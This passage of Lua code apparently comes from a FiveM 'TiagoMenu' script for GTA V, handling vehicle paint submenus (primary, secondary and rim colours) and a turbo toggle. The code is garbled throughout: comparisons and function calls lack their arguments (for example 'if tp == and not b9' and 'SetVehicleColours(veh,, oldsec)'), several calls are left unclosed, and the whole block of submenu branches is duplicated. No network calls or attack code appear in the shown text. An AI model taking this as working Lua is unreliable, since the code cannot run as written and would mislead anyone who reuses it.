  7107. if not IsToggleModOn(veh, 18) then
  7108. ToggleVehicleMod(veh, 18, not IsToggleModOn(veh, 18))
  7109. end
  7110. end
  7111. TiagoMenu.Display()
  7112. elseif TiagoMenu.IsMenuOpened('primary') then
  7113. TiagoMenu.MenuButton('~h~~p~-> ~s~Classic', 'classic1')
  7114. TiagoMenu.MenuButton('~h~~p~-> ~s~Metallic', 'metallic1')
  7115. TiagoMenu.MenuButton('~h~~p~-> ~s~Matte', 'matte1')
  7116. TiagoMenu.MenuButton('~h~~p~-> ~s~Metal', 'metal1')
  7117. TiagoMenu.Display()
  7118. elseif TiagoMenu.IsMenuOpened('secondary') then
  7119. TiagoMenu.MenuButton('~h~~p~-> ~s~Classic', 'classic2')
  7120. TiagoMenu.MenuButton('~h~~p~-> ~s~Metallic', 'metallic2')
  7121. TiagoMenu.MenuButton('~h~~p~-> ~s~Matte', 'matte2')
  7122. TiagoMenu.MenuButton('~h~~p~-> ~s~Metal', 'metal2')
  7123. TiagoMenu.Display()
  7124. elseif TiagoMenu.IsMenuOpened('rimpaint') then
  7125. TiagoMenu.MenuButton('~h~~p~-> ~s~Classic', 'classic3')
  7126. TiagoMenu.MenuButton('~h~~p~-> ~s~Metallic', 'metallic3')
  7127. TiagoMenu.MenuButton('~h~~p~-> ~s~Matte', 'matte3')
  7128. TiagoMenu.MenuButton('~h~~p~-> ~s~Metal', 'metal3')
  7129. TiagoMenu.Display()
  7130. elseif TiagoMenu.IsMenuOpened('classic1') then
  7131. for dt, du in pairs(bh) do
  7132. tp, ts = GetVehicleColours(veh)
  7133. if tp == and not b9 then
  7134. pricetext = 'Installed'
  7135. else
  7136. if b9 and tp == then
  7137. pricetext = 'Previewing'
  7138. else
  7139. pricetext = 'Not Installed'
  7140. end
  7141. end
  7142. curprim, cursec = GetVehicleColours(veh)
  7143. if TiagoMenu.Button(, pricetext) then
  7144. if not b9 then
  7145. bb = 'paint'
  7146. bd = false
  7147. oldprim, oldsec = GetVehicleColours(veh)
  7148. oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
  7149. ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
  7150. SetVehicleColours(veh,, oldsec)
  7151. SetVehicleExtraColours(veh,, oldwheelcolour)
  7152. b9 = true
  7153. elseif b9 and curprim == then
  7154. SetVehicleColours(veh,, oldsec)
  7155. SetVehicleExtraColours(veh,, oldwheelcolour)
  7156. b9 = false
  7157. bb = -1
  7158. ba = -1
  7159. elseif b9 and curprim ~= then
  7160. SetVehicleColours(veh,, oldsec)
  7161. SetVehicleExtraColours(veh,, oldwheelcolour)
  7162. b9 = true
  7163. end
  7164. end
  7165. end
  7166. TiagoMenu.Display()
  7167. elseif TiagoMenu.IsMenuOpened('metallic1') then
  7168. for dt, du in pairs(bh) do
  7169. tp, ts = GetVehicleColours(veh)
  7170. if tp == and not b9 then
  7171. pricetext = 'Installed'
  7172. else
  7173. if b9 and tp == then
  7174. pricetext = 'Previewing'
  7175. else
  7176. pricetext = 'Not Installed'
  7177. end
  7178. end
  7179. curprim, cursec = GetVehicleColours(veh)
  7180. if TiagoMenu.Button(, pricetext) then
  7181. if not b9 then
  7182. bb = 'paint'
  7183. bd = false
  7184. oldprim, oldsec = GetVehicleColours(veh)
  7185. oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
  7186. ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
  7187. SetVehicleColours(veh,, oldsec)
  7188. SetVehicleExtraColours(veh,, oldwheelcolour)
  7189. b9 = true
  7190. elseif b9 and curprim == then
  7191. SetVehicleColours(veh,, oldsec)
  7192. SetVehicleExtraColours(veh,, oldwheelcolour)
  7193. b9 = false
  7194. bb = -1
  7195. ba = -1
  7196. elseif b9 and curprim ~= then
  7197. SetVehicleColours(veh,, oldsec)
  7198. SetVehicleExtraColours(veh,, oldwheelcolour)
  7199. b9 = true
  7200. end
  7201. end
  7202. end
  7203. TiagoMenu.Display()
  7204. elseif TiagoMenu.IsMenuOpened('matte1') then
  7205. for dt, du in pairs(bj) do
  7206. tp, ts = GetVehicleColours(veh)
  7207. if tp == and not b9 then
  7208. pricetext = 'Installed'
  7209. else
  7210. if b9 and tp == then
  7211. pricetext = 'Previewing'
  7212. else
  7213. pricetext = 'Not Installed'
  7214. end
  7215. end
  7216. curprim, cursec = GetVehicleColours(veh)
  7217. if TiagoMenu.Button(, pricetext) then
  7218. if not b9 then
  7219. bb = 'paint'
  7220. bd = false
  7221. oldprim, oldsec = GetVehicleColours(veh)
  7222. oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
  7223. SetVehicleExtraColours(veh,, oldwheelcolour)
  7224. ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
  7225. SetVehicleColours(veh,, oldsec)
  7226. b9 = true
  7227. elseif b9 and curprim == then
  7228. SetVehicleColours(veh,, oldsec)
  7229. SetVehicleExtraColours(veh,, oldwheelcolour)
  7230. b9 = false
  7231. bb = -1
  7232. ba = -1
  7233. elseif b9 and curprim ~= then
  7234. SetVehicleColours(veh,, oldsec)
  7235. SetVehicleExtraColours(veh,, oldwheelcolour)
  7236. b9 = true
  7237. end
  7238. end
  7239. end
  7240. TiagoMenu.Display()
  7241. elseif TiagoMenu.IsMenuOpened('metal1') then
  7242. for dt, du in pairs(bk) do
  7243. tp, ts = GetVehicleColours(veh)
  7244. if tp == and not b9 then
  7245. pricetext = 'Installed'
  7246. else
  7247. if b9 and tp == then
  7248. pricetext = 'Previewing'
  7249. else
  7250. pricetext = 'Not Installed'
  7251. end
  7252. end
  7253. curprim, cursec = GetVehicleColours(veh)
  7254. if TiagoMenu.Button(, pricetext) then
  7255. if not b9 then
  7256. bb = 'paint'
  7257. bd = false
  7258. oldprim, oldsec = GetVehicleColours(veh)
  7259. oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
  7260. ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
  7261. SetVehicleExtraColours(veh,, oldwheelcolour)
  7262. SetVehicleColours(veh,, oldsec)
  7263. b9 = true
  7264. elseif b9 and curprim == then
  7265. SetVehicleColours(veh,, oldsec)
  7266. SetVehicleExtraColours(veh,, oldwheelcolour)
  7267. b9 = false
  7268. bb = -1
  7269. ba = -1
  7270. elseif b9 and curprim ~= then
  7271. SetVehicleColours(veh,, oldsec)
  7272. SetVehicleExtraColours(veh,, oldwheelcolour)
  7273. b9 = true
  7274. end
  7275. end
  7276. end
  7277. TiagoMenu.Display()
  7278. elseif TiagoMenu.IsMenuOpened('classic2') then
  7279. for dt, du in pairs(bh) do
  7280. tp, ts = GetVehicleColours(veh)
  7281. if ts == and not b9 then
  7282. pricetext = 'Installed'
  7283. else
  7284. if b9 and ts == then
  7285. pricetext = 'Previewing'
  7286. else
  7287. pricetext = 'Not Installed'
  7288. end
  7289. end
  7290. curprim, cursec = GetVehicleColours(veh)
  7291. if TiagoMenu.Button(, pricetext) then
  7292. if not b9 then
  7293. bb = 'paint'
  7294. bd = false
  7295. oldprim, oldsec = GetVehicleColours(veh)
  7296. ba = table.pack(oldprim, oldsec)
  7297. SetVehicleColours(veh, oldprim,
  7298. b9 = true
  7299. elseif b9 and cursec == then
  7300. SetVehicleColours(veh, oldprim,
  7301. b9 = false
  7302. bb = -1
  7303. ba = -1
  7304. elseif b9 and cursec ~= then
  7305. SetVehicleColours(veh, oldprim,
  7306. b9 = true
  7307. end
  7308. end
  7309. end
  7310. TiagoMenu.Display()
  7311. elseif TiagoMenu.IsMenuOpened('metallic2') then
  7312. for dt, du in pairs(bh) do
  7313. tp, ts = GetVehicleColours(veh)
  7314. if ts == and not b9 then
  7315. pricetext = 'Installed'
  7316. else
  7317. if b9 and ts == then
  7318. pricetext = 'Previewing'
  7319. else
  7320. pricetext = 'Not Installed'
  7321. end
  7322. end
  7323. curprim, cursec = GetVehicleColours(veh)
  7324. if TiagoMenu.Button(, pricetext) then
  7325. if not b9 then
  7326. bb = 'paint'
  7327. bd = false
  7328. oldprim, oldsec = GetVehicleColours(veh)
  7329. ba = table.pack(oldprim, oldsec)
  7330. SetVehicleColours(veh, oldprim,
  7331. b9 = true
  7332. elseif b9 and cursec == then
  7333. SetVehicleColours(veh, oldprim,
  7334. b9 = false
  7335. bb = -1
  7336. ba = -1
  7337. elseif b9 and cursec ~= then
  7338. SetVehicleColours(veh, oldprim,
  7339. b9 = true
  7340. end
  7341. end
  7342. end
  7343. TiagoMenu.Display()
  7344. elseif TiagoMenu.IsMenuOpened('matte2') then
  7345. for dt, du in pairs(bj) do
  7346. tp, ts = GetVehicleColours(veh)
  7347. if ts == and not b9 then
  7348. pricetext = 'Installed'
  7349. else
  7350. if b9 and ts == then
  7351. pricetext = 'Previewing'
  7352. else
  7353. pricetext = 'Not Installed'
  7354. end
  7355. end
  7356. curprim, cursec = GetVehicleColours(veh)
  7357. if TiagoMenu.Button(, pricetext) then
  7358. if not b9 then
  7359. bb = 'paint'
  7360. bd = false
  7361. oldprim, oldsec = GetVehicleColours(veh)
  7362. ba = table.pack(oldprim, oldsec)
  7363. SetVehicleColours(veh, oldprim,
  7364. b9 = true
  7365. elseif b9 and cursec == then
  7366. SetVehicleColours(veh, oldprim,
  7367. b9 = false
  7368. bb = -1
  7369. ba = -1
  7370. elseif b9 and cursec ~= then
  7371. SetVehicleColours(veh, oldprim,
  7372. b9 = true
  7373. end
  7374. end
  7375. end
  7376. TiagoMenu.Display()
  7377. elseif TiagoMenu.IsMenuOpened('metal2') then
  7378. for dt, du in pairs(bk) do
  7379. tp, ts = GetVehicleColours(veh)
  7380. if ts == and not b9 then
  7381. pricetext = 'Installed'
  7382. else
  7383. if b9 and ts == then
  7384. pricetext = 'Previewing'
  7385. else
  7386. pricetext = 'Not Installed'
  7387. end
  7388. end
  7389. curprim, cursec = GetVehicleColours(veh)
  7390. if TiagoMenu.Button(, pricetext) then
  7391. if not b9 then
  7392. bb = 'paint'
  7393. bd = false
  7394. oldprim, oldsec = GetVehicleColours(veh)
  7395. ba = table.pack(oldprim, oldsec)
  7396. SetVehicleColours(veh, oldprim,
  7397. b9 = true
  7398. elseif b9 and cursec == then
  7399. SetVehicleColours(veh, oldprim,
  7400. b9 = false
  7401. bb = -1
  7402. ba = -1
  7403. elseif b9 and cursec ~= then
  7404. SetVehicleColours(veh, oldprim,
  7405. b9 = true
  7406. end
  7407. end
  7408. end
  7409. TiagoMenu.Display()
  7410. elseif TiagoMenu.IsMenuOpened('classic3') then
  7411. for dt, du in pairs(bh) do
  7412. _, ts = GetVehicleExtraColours(veh)
  7413. if ts == and not b9 then
  7414. pricetext = 'Installed'
  7415. else
  7416. if b9 and ts == then
  7417. pricetext = 'Previewing'
  7418. else
  7419. pricetext = 'Not Installed'
  7420. end
  7421. end
  7422. _, currims = GetVehicleExtraColours(veh)
  7423. if TiagoMenu.Button(, pricetext) then
  7424. if not b9 then
  7425. bb = 'paint'
  7426. bd = false
  7427. oldprim, oldsec = GetVehicleColours(veh)
  7428. oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
  7429. ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
  7430. SetVehicleExtraColours(veh, oldpearl,
  7431. b9 = true
  7432. elseif b9 and currims == then
  7433. SetVehicleExtraColours(veh, oldpearl,
  7434. b9 = false
  7435. bb = -1
  7436. ba = -1
  7437. elseif b9 and currims ~= then
  7438. SetVehicleExtraColours(veh, oldpearl,
  7439. b9 = true
  7440. end
  7441. end
  7442. end
  7443. TiagoMenu.Display()
  7444. elseif TiagoMenu.IsMenuOpened('metallic3') then
  7445. for dt, du in pairs(bh) do
  7446. _, ts = GetVehicleExtraColours(veh)
  7447. if ts == and not b9 then
  7448. pricetext = 'Installed'
  7449. else
  7450. if b9 and ts == then
  7451. pricetext = 'Previewing'
  7452. else
  7453. pricetext = 'Not Installed'
  7454. end
  7455. end
  7456. _, currims = GetVehicleExtraColours(veh)
  7457. if TiagoMenu.Button(, pricetext) then
  7458. if not b9 then
  7459. bb = 'paint'
  7460. bd = false
  7461. oldprim, oldsec = GetVehicleColours(veh)
  7462. oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
  7463. ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
  7464. SetVehicleExtraColours(veh, oldpearl,
  7465. b9 = true
  7466. elseif b9 and currims == then
  7467. SetVehicleExtraColours(veh, oldpearl,
  7468. b9 = false
  7469. bb = -1
  7470. ba = -1
  7471. elseif b9 and currims ~= then
  7472. SetVehicleExtraColours(veh, oldpearl,
  7473. b9 = true
  7474. end
  7475. end
  7476. end
  7477. TiagoMenu.Display()
  7478. elseif TiagoMenu.IsMenuOpened('matte3') then
  7479. for dt, du in pairs(bj) do
  7480. _, ts = GetVehicleExtraColours(veh)
  7481. if ts == and not b9 then
  7482. pricetext = 'Installed'
  7483. else
  7484. if b9 and ts == then
  7485. pricetext = 'Previewing'
  7486. else
  7487. pricetext = 'Not Installed'
  7488. end
  7489. end
  7490. _, currims = GetVehicleExtraColours(veh)
  7491. if TiagoMenu.Button(, pricetext) then
  7492. if not b9 then
  7493. bb = 'paint'
  7494. bd = false
  7495. oldprim, oldsec = GetVehicleColours(veh)
  7496. oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
  7497. ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
  7498. SetVehicleExtraColours(veh, oldpearl,
  7499. b9 = true
  7500. elseif b9 and currims == then
  7501. SetVehicleExtraColours(veh, oldpearl,
  7502. b9 = false
  7503. bb = -1
  7504. ba = -1
  7505. elseif b9 and currims ~= then
  7506. SetVehicleExtraColours(veh, oldpearl,
  7507. b9 = true
  7508. end
  7509. end
  7510. end
  7511. TiagoMenu.Display()
  7512. elseif TiagoMenu.IsMenuOpened('metal3') then
  7513. for dt, du in pairs(bk) do
  7514. _, ts = GetVehicleExtraColours(veh)
  7515. if ts == and not b9 then
  7516. pricetext = 'Installed'
  7517. else
  7518. if b9 and ts == then
  7519. pricetext = 'Previewing'
  7520. else
  7521. pricetext = 'Not Installed'
  7522. end
  7523. end
  7524. _, currims = GetVehicleExtraColours(veh)
  7525. if TiagoMenu.Button(, pricetext) then
  7526. if not b9 then
  7527. bb = 'paint'
  7528. bd = false
  7529. oldprim, oldsec = GetVehicleColours(veh)
  7530. oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
  7531. ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
  7532. SetVehicleExtraColours(veh, oldpearl,
  7533. b9 = true
  7534. elseif b9 and currims == then
  7535. SetVehicleExtraColours(veh, oldpearl,
  7536. b9 = false
  7537. bb = -1
  7538. ba = -1
  7539. elseif b9 and currims ~= then
  7540. SetVehicleExtraColours(veh, oldpearl,
  7541. b9 = true
  7542. end
  7543. end
  7544. end
  7545. TiagoMenu.Display()
  7546. elseif TiagoMenu.IsMenuOpened('performance') then
  7547. veh = GetVehiclePedIsUsing(PlayerPedId())
  7548. for i, da in pairs(bf) do
  7549. if TiagoMenu.MenuButton(, then
  7550. end
  7551. end
  7552. if IsToggleModOn(veh, 18) then
  7553. turboStatus = 'Installed'
  7554. else
  7555. turboStatus = 'Not Installed'
  7556. end
  7557. if TiagoMenu.Button('~h~~b~Turbo ~h~Tune', turboStatus) then
  7558. if not IsToggleModOn(veh, 18) then
  7559. ToggleVehicleMod(veh, 18, not IsToggleModOn(veh, 18))
  7560. end
  7561. end
  7562. TiagoMenu.Display()
  7563. elseif TiagoMenu.IsMenuOpened('primary') then
  7564. TiagoMenu.MenuButton('~h~~p~-> ~s~Classic', 'classic1')
  7565. TiagoMenu.MenuButton('~h~~p~-> ~s~Metallic', 'metallic1')
  7566. TiagoMenu.MenuButton('~h~~p~-> ~s~Matte', 'matte1')
  7567. TiagoMenu.MenuButton('~h~~p~-> ~s~Metal', 'metal1')
  7568. TiagoMenu.Display()
  7569. elseif TiagoMenu.IsMenuOpened('secondary') then
  7570. TiagoMenu.MenuButton('~h~~p~-> ~s~Classic', 'classic2')
  7571. TiagoMenu.MenuButton('~h~~p~-> ~s~Metallic', 'metallic2')
  7572. TiagoMenu.MenuButton('~h~~p~-> ~s~Matte', 'matte2')
  7573. TiagoMenu.MenuButton('~h~~p~-> ~s~Metal', 'metal2')
  7574. TiagoMenu.Display()
  7575. elseif TiagoMenu.IsMenuOpened('rimpaint') then
  7576. TiagoMenu.MenuButton('~h~~p~-> ~s~Classic', 'classic3')
  7577. TiagoMenu.MenuButton('~h~~p~-> ~s~Metallic', 'metallic3')
  7578. TiagoMenu.MenuButton('~h~~p~-> ~s~Matte', 'matte3')
  7579. TiagoMenu.MenuButton('~h~~p~-> ~s~Metal', 'metal3')
  7580. TiagoMenu.Display()
  7581. elseif TiagoMenu.IsMenuOpened('classic1') then
  7582. for dt, du in pairs(bh) do
  7583. tp, ts = GetVehicleColours(veh)
  7584. if tp == and not b9 then
  7585. pricetext = 'Installed'
  7586. else
  7587. if b9 and tp == then
  7588. pricetext = 'Previewing'
  7589. else
  7590. pricetext = 'Not Installed'
  7591. end
  7592. end
  7593. curprim, cursec = GetVehicleColours(veh)
  7594. if TiagoMenu.Button(, pricetext) then
  7595. if not b9 then
  7596. bb = 'paint'
  7597. bd = false
  7598. oldprim, oldsec = GetVehicleColours(veh)
  7599. oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
  7600. ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
  7601. SetVehicleColours(veh,, oldsec)
  7602. SetVehicleExtraColours(veh,, oldwheelcolour)
  7603. b9 = true
  7604. elseif b9 and curprim == then
  7605. SetVehicleColours(veh,, oldsec)
  7606. SetVehicleExtraColours(veh,, oldwheelcolour)
  7607. b9 = false
  7608. bb = -1
  7609. ba = -1
  7610. elseif b9 and curprim ~= then
  7611. SetVehicleColours(veh,, oldsec)
  7612. SetVehicleExtraColours(veh,, oldwheelcolour)
  7613. b9 = true
  7614. end
  7615. end
  7616. end
  7617. TiagoMenu.Display()
  7618. elseif TiagoMenu.IsMenuOpened('metallic1') then
  7619. for dt, du in pairs(bh) do
  7620. tp, ts = GetVehicleColours(veh)
  7621. if tp == and not b9 then
  7622. pricetext = 'Installed'
  7623. else
  7624. if b9 and tp == then
  7625. pricetext = 'Previewing'
  7626. else
  7627. pricetext = 'Not Installed'
  7628. end
  7629. end
  7630. curprim, cursec = GetVehicleColours(veh)
  7631. if TiagoMenu.Button(, pricetext) then
  7632. if not b9 then
  7633. bb = 'paint'
  7634. bd = false
  7635. oldprim, oldsec = GetVehicleColours(veh)
  7636. oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
  7637. ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
  7638. SetVehicleColours(veh,, oldsec)
  7639. SetVehicleExtraColours(veh,, oldwheelcolour)
  7640. b9 = true
  7641. elseif b9 and curprim == then
  7642. SetVehicleColours(veh,, oldsec)
  7643. SetVehicleExtraColours(veh,, oldwheelcolour)
  7644. b9 = false
  7645. bb = -1
  7646. ba = -1
  7647. elseif b9 and curprim ~= then
  7648. SetVehicleColours(veh,, oldsec)
  7649. SetVehicleExtraColours(veh,, oldwheelcolour)
  7650. b9 = true
  7651. end
  7652. end
  7653. end
  7654. TiagoMenu.Display()
  7655. elseif TiagoMenu.IsMenuOpened('matte1') then
  7656. for dt, du in pairs(bj) do
  7657. tp, ts = GetVehicleColours(veh)
  7658. if tp == and not b9 then
  7659. pricetext = 'Installed'
  7660. else
  7661. if b9 and tp == then
  7662. pricetext = 'Previewing'
  7663. else
  7664. pricetext = 'Not Installed'
  7665. end
  7666. end
  7667. curprim, cursec = GetVehicleColours(veh)
  7668. if TiagoMenu.Button(, pricetext) then
  7669. if not b9 then
  7670. bb = 'paint'
  7671. bd = false
  7672. oldprim, oldsec = GetVehicleColours(veh)
  7673. oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
  7674. SetVehicleExtraColours(veh,, oldwheelcolour)
  7675. ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
  7676. SetVehicleColours(veh,, oldsec)
  7677. b9 = true
  7678. elseif b9 and curprim == then
  7679. SetVehicleColours(veh,, oldsec)
  7680. SetVehicleExtraColours(veh,, oldwheelcolour)
  7681. b9 = false
  7682. bb = -1
  7683. ba = -1
  7684. elseif b9 and curprim ~= then
  7685. SetVehicleColours(veh,, oldsec)
  7686. SetVehicleExtraColours(veh,, oldwheelcolour)
  7687. b9 = true
  7688. end
  7689. end
  7690. end
  7691. TiagoMenu.Display()
  7692. elseif TiagoMenu.IsMenuOpened('metal1') then
  7693. for dt, du in pairs(bk) do
  7694. tp, ts = GetVehicleColours(veh)
  7695. if tp == and not b9 then
  7696. pricetext = 'Installed'
  7697. else
  7698. if b9 and tp == then
  7699. pricetext = 'Previewing'
  7700. else
  7701. pricetext = 'Not Installed'
  7702. end
  7703. end
  7704. curprim, cursec = GetVehicleColours(veh)
  7705. if TiagoMenu.Button(, pricetext) then
  7706. if not b9 then
  7707. bb = 'paint'
  7708. bd = false
  7709. oldprim, oldsec = GetVehicleColours(veh)
  7710. oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
  7711. ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
  7712. SetVehicleExtraColours(veh,, oldwheelcolour)
  7713. SetVehicleColours(veh,, oldsec)
  7714. b9 = true
  7715. elseif b9 and curprim == then
  7716. SetVehicleColours(veh,, oldsec)
  7717. SetVehicleExtraColours(veh,, oldwheelcolour)
  7718. b9 = false
  7719. bb = -1
  7720. ba = -1
  7721. elseif b9 and curprim ~= then
  7722. SetVehicleColours(veh,, oldsec)
  7723. SetVehicleExtraColours(veh,, oldwheelcolour)
  7724. b9 = true
  7725. end
  7726. end
  7727. end
  7728. TiagoMenu.Display()
  7729. elseif TiagoMenu.IsMenuOpened('classic2') then
  7730. for dt, du in pairs(bh) do
  7731. tp, ts = GetVehicleColours(veh)
  7732. if ts == and not b9 then
  7733. pricetext = 'Installed'
  7734. else
  7735. if b9 and ts == then
  7736. pricetext = 'Previewing'
  7737. else
  7738. pricetext = 'Not Installed'
  7739. end
  7740. end
  7741. curprim, cursec = GetVehicleColours(veh)
  7742. if TiagoMenu.Button(, pricetext) then
  7743. if not b9 then
  7744. bb = 'paint'
  7745. bd = false
  7746. oldprim, oldsec = GetVehicleColours(veh)
  7747. ba = table.pack(oldprim, oldsec)
  7748. SetVehicleColours(veh, oldprim,
  7749. b9 = true
  7750. elseif b9 and cursec == then
  7751. SetVehicleColours(veh, oldprim,
  7752. b9 = false
  7753. bb = -1
  7754. ba = -1
  7755. elseif b9 and cursec ~= then
  7756. SetVehicleColours(veh, oldprim,
  7757. b9 = true
  7758. end
  7759. end
  7760. end
  7761. TiagoMenu.Display()
  7762. elseif TiagoMenu.IsMenuOpened('metallic2') then
  7763. for dt, du in pairs(bh) do
  7764. tp, ts = GetVehicleColours(veh)
  7765. if ts == and not b9 then
  7766. pricetext = 'Installed'
  7767. else
  7768. if b9 and ts == then
  7769. pricetext = 'Previewing'
  7770. else
  7771. pricetext = 'Not Installed'
  7772. end
  7773. end
  7774. curprim, cursec = GetVehicleColours(veh)
  7775. if TiagoMenu.Button(, pricetext) then
  7776. if not b9 then
  7777. bb = 'paint'
  7778. bd = false
  7779. oldprim, oldsec = GetVehicleColours(veh)
  7780. ba = table.pack(oldprim, oldsec)
  7781. SetVehicleColours(veh, oldprim,
  7782. b9 = true
  7783. elseif b9 and cursec == then
  7784. SetVehicleColours(veh, oldprim,
  7785. b9 = false
  7786. bb = -1
  7787. ba = -1
  7788. elseif b9 and cursec ~= then
  7789. SetVehicleColours(veh, oldprim,
  7790. b9 = true
  7791. end
  7792. end
  7793. end
  7794. TiagoMenu.Display()
  7795. elseif TiagoMenu.IsMenuOpened('matte2') then
  7796. for dt, du in pairs(bj) do
  7797. tp, ts = GetVehicleColours(veh)
  7798. if ts == and not b9 then
  7799. pricetext = 'Installed'
  7800. else
  7801. if b9 and ts == then
  7802. pricetext = 'Previewing'
  7803. else
  7804. pricetext = 'Not Installed'
  7805. end
  7806. end
  7807. curprim, cursec = GetVehicleColours(veh)
  7808. if TiagoMenu.Button(, pricetext) then
  7809. if not b9 then
  7810. bb = 'paint'
  7811. bd = false
  7812. oldprim, oldsec = GetVehicleColours(veh)
  7813. ba = table.pack(oldprim, oldsec)
  7814. SetVehicleColours(veh, oldprim,
  7815. b9 = true
  7816. elseif b9 and cursec == then
  7817. SetVehicleColours(veh, oldprim,
  7818. b9 = false
  7819. bb = -1
  7820. ba = -1
  7821. elseif b9 and cursec ~= then
  7822. SetVehicleColours(veh, oldprim,
  7823. b9 = true
  7824. end
  7825. end
  7826. end
  7827. TiagoMenu.Display()
  7828. elseif TiagoMenu.IsMenuOpened('metal2') then
  7829. for dt, du in pairs(bk) do
  7830. tp, ts = GetVehicleColours(veh)
  7831. if ts == and not b9 then
  7832. pricetext = 'Installed'
  7833. else
  7834. if b9 and ts == then
  7835. pricetext = 'Previewing'
  7836. else
  7837. pricetext = 'Not Installed'
  7838. end
  7839. end
  7840. curprim, cursec = GetVehicleColours(veh)
  7841. if TiagoMenu.Button(, pricetext) then
  7842. if not b9 then
  7843. bb = 'paint'
  7844. bd = false
  7845. oldprim, oldsec = GetVehicleColours(veh)
  7846. ba = table.pack(oldprim, oldsec)
  7847. SetVehicleColours(veh, oldprim,
  7848. b9 = true
  7849. elseif b9 and cursec == then
  7850. SetVehicleColours(veh, oldprim,
  7851. b9 = false
  7852. bb = -1
  7853. ba = -1
  7854. elseif b9 and cursec ~= then
  7855. SetVehicleColours(veh, oldprim,
  7856. b9 = true
  7857. end
  7858. end
  7859. end
  7860. TiagoMenu.Display()
  7861. elseif TiagoMenu.IsMenuOpened('classic3') then
  7862. for dt, du in pairs(bh) do
  7863. _, ts = GetVehicleExtraColours(veh)
  7864. if ts == and not b9 then
  7865. pricetext = 'Installed'
  7866. else
  7867. if b9 and ts == then
  7868. pricetext = 'Previewing'
  7869. else
  7870. pricetext = 'Not Installed'
  7871. end
  7872. end
  7873. _, currims = GetVehicleExtraColours(veh)
  7874. if TiagoMenu.Button(, pricetext) then
  7875. if not b9 then
  7876. bb = 'paint'
  7877. bd = false
  7878. oldprim, oldsec = GetVehicleColours(veh)
  7879. oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
  7880. ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
  7881. SetVehicleExtraColours(veh, oldpearl,
  7882. b9 = true
  7883. elseif b9 and currims == then
  7884. SetVehicleExtraColours(veh, oldpearl,
  7885. b9 = false
  7886. bb = -1
  7887. ba = -1
  7888. elseif b9 and currims ~= then
  7889. SetVehicleExtraColours(veh, oldpearl,
  7890. b9 = true
  7891. end
  7892. end
  7893. end
  7894. TiagoMenu.Display()
  7895. elseif TiagoMenu.IsMenuOpened('metallic3') then
  7896. for dt, du in pairs(bh) do
  7897. _, ts = GetVehicleExtraColours(veh)
  7898. if ts == and not b9 then
  7899. pricetext = 'Installed'
  7900. else
  7901. if b9 and ts == then
  7902. pricetext = 'Previewing'
  7903. else
  7904. pricetext = 'Not Installed'
  7905. end
  7906. end
  7907. _, currims = GetVehicleExtraColours(veh)
  7908. if TiagoMenu.Button(, pricetext) then
  7909. if not b9 then
  7910. bb = 'paint'
  7911. bd = false
  7912. oldprim, oldsec = GetVehicleColours(veh)
  7913. oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
  7914. ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
  7915. SetVehicleExtraColours(veh, oldpearl,
  7916. b9 = true
  7917. elseif b9 and currims == then
  7918. SetVehicleExtraColours(veh, oldpearl,
  7919. b9 = false
  7920. bb = -1
  7921. ba = -1
  7922. elseif b9 and currims ~= then
  7923. SetVehicleExtraColours(veh, oldpearl,
  7924. b9 = true
  7925. end
  7926. end
  7927. end
  7928. TiagoMenu.Display()
  7929. elseif TiagoMenu.IsMenuOpened('matte3') then
  7930. for dt, du in pairs(bj) do
  7931. _, ts = GetVehicleExtraColours(veh)
  7932. if ts == and not b9 then
  7933. pricetext = 'Installed'
  7934. else
  7935. if b9 and ts == then
  7936. pricetext = 'Previewing'
  7937. else
  7938. pricetext = 'Not Installed'
  7939. end
  7940. end
  7941. _, currims = GetVehicleExtraColours(veh)
  7942. if TiagoMenu.Button(, pricetext) then
  7943. if not b9 then
  7944. bb = 'paint'
  7945. bd = false
  7946. oldprim, oldsec = GetVehicleColours(veh)
  7947. oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
  7948. ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
  7949. SetVehicleExtraColours(veh, oldpearl,
  7950. b9 = true
  7951. elseif b9 and currims == then
  7952. SetVehicleExtraColours(veh, oldpearl,
  7953. b9 = false
  7954. bb = -1
  7955. ba = -1
  7956. elseif b9 and currims ~= then
  7957. SetVehicleExtraColours(veh, oldpearl,
  7958. b9 = true
  7959. end
  7960. end
  7961. end
  7962. TiagoMenu.Display()
  7963. elseif TiagoMenu.IsMenuOpened('metal3') then
  7964. for dt, du in pairs(bk) do
  7965. _, ts = GetVehicleExtraColours(veh)
  7966. if ts == and not b9 then
  7967. pricetext = 'Installed'
  7968. else
  7969. if b9 and ts == then
  7970. pricetext = 'Previewing'
  7971. else
  7972. pricetext = 'Not Installed'
  7973. end
  7974. end
  7975. _, currims = GetVehicleExtraColours(veh)
  7976. if TiagoMenu.Button(, pricetext) then
  7977. if not b9 then
  7978. bb = 'paint'
  7979. bd = false
  7980. oldprim, oldsec = GetVehicleColours(veh)
  7981. oldpearl, oldwheelcolour = GetVehicleExtraColours(veh)
  7982. ba = table.pack(oldprim, oldsec, oldpearl, oldwheelcolour)
